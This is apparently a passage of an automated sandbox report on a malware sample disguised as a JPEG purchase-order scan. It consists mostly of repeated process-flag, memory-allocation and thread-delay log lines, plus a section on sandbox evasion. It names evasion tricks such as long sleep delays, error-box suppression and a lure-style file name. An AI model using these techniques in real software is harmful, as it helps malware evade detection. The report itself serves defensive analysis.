                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: 1410000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: 31B0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: 17C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: 94A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: A4A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: A6B0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: B6B0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: C1D0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: D1D0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: E1D0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: 11A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: 2D00000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Memory allocated: 2B00000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: 1290000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: 2E10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: 2C60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: 8AC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: 9AC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: 9CB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: ACB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: B790000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: C790000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: 29A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: 2BA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Memory allocated: 4BA0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 599883
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 599765
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 599656
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 599546
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 599437
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 599328
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 599213
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 599109
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 598999
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 598889
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 598765
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 598656
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 598531
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 598422
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 598312
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 598170
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 598062
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 597937
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 597828
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 597718
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 597609
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 597477
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 597374
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 597265
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 597136
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 597030
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 596878
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 596753
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 596593
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 596468
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 596345
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 596234
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 596125
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 596015
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 595906
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 595796
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 595687
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 595578
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 595468
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 595359
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 595249
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 595140
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 595031
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Thread delayed: delay time: 594921
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594812Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594593Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594481Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594374Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594155Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599546
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599327
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599109
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599000
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598890
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598781
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598671
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598562
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598375
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598265
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598155
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597984
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597858
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597749
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597640
